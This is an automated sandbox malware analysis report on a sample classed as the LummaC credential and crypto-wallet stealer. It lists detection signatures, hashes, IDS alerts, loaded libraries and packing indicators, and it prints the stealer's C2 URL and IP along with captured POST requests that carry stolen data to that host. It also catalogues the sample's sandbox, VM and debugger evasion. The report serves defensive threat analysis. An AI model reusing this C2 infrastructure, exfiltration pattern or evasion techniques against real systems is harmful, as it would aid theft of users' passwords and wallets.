
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561463
MD5: 44eb876d74e66bc5879d4ac1b636eaf1
SHA1: 614cc57507b70108e366e88e296db7c9c10f029e
SHA256: e8030c08981ae2cccfda22cbfd18ede9d1e1e51495ece00ccae6f8ebcad1c6f0
Tags: exe, user-Bitsight

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 44EB876D74E66BC5879D4AC1B636EAF1)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Source                                    Rule                           Description                       Author        Strings
sslproxydump.pcap                         JoeSecurity_LummaCStealer_3    Yara detected LummaC Stealer      Joe Security
Process Memory Space: file.exe PID: 4392  JoeSecurity_LummaCStealer_3    Yara detected LummaC Stealer      Joe Security
Process Memory Space: file.exe PID: 4392  JoeSecurity_CredentialStealer  Yara detected Credential Stealer  Joe Security
Process Memory Space: file.exe PID: 4392  JoeSecurity_LummaCStealer      Yara detected LummaC Stealer      Joe Security

No Sigma rule has matched

Timestamp                        SID      Severity  Classtype                                       Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-11-23T13:57:33.993626+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49707        104.21.33.116   443               TCP
2024-11-23T13:57:35.979561+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49708        104.21.33.116   443               TCP
2024-11-23T13:57:38.191607+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49710        104.21.33.116   443               TCP
2024-11-23T13:57:40.446583+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49712        104.21.33.116   443               TCP
2024-11-23T13:57:42.848399+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49713        104.21.33.116   443               TCP
2024-11-23T13:57:45.639772+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49720        104.21.33.116   443               TCP
2024-11-23T13:57:48.020217+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49729        104.21.33.116   443               TCP
2024-11-23T13:57:52.147862+0100  2028371  3         Unknown Traffic                                 192.168.2.6  49745        104.21.33.116   443               TCP
2024-11-23T13:57:34.672720+0100  2054653  1         A Network Trojan was detected                   192.168.2.6  49707        104.21.33.116   443               TCP
2024-11-23T13:57:36.672012+0100  2054653  1         A Network Trojan was detected                   192.168.2.6  49708        104.21.33.116   443               TCP
2024-11-23T13:57:34.672720+0100  2049836  1         A Network Trojan was detected                   192.168.2.6  49707        104.21.33.116   443               TCP
2024-11-23T13:57:36.672012+0100  2049812  1         A Network Trojan was detected                   192.168.2.6  49708        104.21.33.116   443               TCP
2024-11-23T13:57:46.236579+0100  2048094  1         Malware Command and Control Activity Detected   192.168.2.6  49720        104.21.33.116   443               TCP

          AV Detection

Source: file.exe | Avira: detected
Source: file.exe.4392.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Source: file.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49729 version: TLS 1.2

          Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49720 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49708 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49708 -> 104.21.33.116:443
Source: Malware configuration extractor | URLs: https://property-imper.sbs/api
Source: Joe Sandbox View | IP Address: 104.21.33.116
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49745 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49729 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.33.116:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=8YZHJO8XC3M
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12823
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=D5KV57W0M5CL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15075
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=WO1UNFDP146E3A
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19945
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=30X3QL46
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1170
    Host: property-imper.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=M6P2U4PWMUOP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 571390
    Host: property-imper.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: property-imper.sbs
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246523182.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2217401886.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195121750.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194913302.000000000557E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/4m
Source: file.exe, file.exe, 00000000.00000002.2328084587.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325286219.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327868106.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328020896.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325286219.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2327868106.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api$#
Source: file.exe, 00000000.00000003.2283650767.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284187170.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apiH#
Source: file.exe, 00000000.00000002.2328020896.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apiZf
Source: file.exe, 00000000.00000002.2328084587.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apis#N
Source: file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/lmy
Source: file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs:443/api
Source: file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs:443/api.default-release/key4.dbPK
Source: file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs:443/apiK
Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2218789963.00000000055A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2218789963.00000000055A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49729 version: TLS 1.2

          System Summary

          barindex
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9993084016393443
          Source: file.exeStatic PE information: Section: prornizb ZLIB complexity 0.9944696162046909
          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.2194861295.0000000005590000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173096174.000000000558D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172735182.00000000055A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194757528.000000000559A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: file.exe Static file information: File size 1852416 > 1048576
          Source: file.exe Static PE information: Raw size of prornizb is bigger than: 0x100000 < 0x19a600

          Data Obfuscation

          Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;prornizb:EW;bkfftptq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;prornizb:EW;bkfftptq:EW;.taggant:EW;
          Source: initial sample Static PE information: section where entry point is pointing to: .taggant
          Source: file.exe Static PE information: real checksum: 0x1d3981 should be: 0x1c7704
          Source: file.exe Static PE information: section name:
          Source: file.exe Static PE information: section name: .idata
          Source: file.exe Static PE information: section name:
          Source: file.exe Static PE information: section name: prornizb
          Source: file.exe Static PE information: section name: bkfftptq
          Source: file.exe Static PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05585392 push edx; retf 0_3_055853A9
